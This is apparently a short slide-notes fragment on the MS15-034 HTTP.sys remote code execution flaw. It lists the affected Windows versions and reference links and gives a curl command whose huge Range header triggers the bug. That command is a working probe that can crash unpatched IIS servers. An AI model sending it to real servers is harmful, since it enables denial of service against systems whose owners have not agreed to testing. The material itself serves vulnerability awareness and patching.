2. Microsoft Security Bulletin MS15-034 - Critical Vulnerability in
HTTP.sys Could Allow Remote Code Execution (3042553)
? Heartbleed 2
Windows 7, Windows Server 2008 R2, Windows 8, Windows Server 2012,
Windows 8.1, and Windows Server 2012 R2. HTTP.sys is used by any
version of IIS running on one of these operating systems. HTTP.sys was
introduced with IIS 6.
curl -v [ipaddress]/ -H "Host: test" -H "Range: bytes=0-
18446744073709551615"
http://www.securitysift.com/an-analysis-of-ms15-034/
https://isc.sans.edu/forums/diary/MS15034+HTTPsys+IIS+DoS+And+Possible+Remote+Code+Execution+PATCH+NOW
/19583/
https://technet.microsoft.com/en-us/library/security/ms15-034.aspx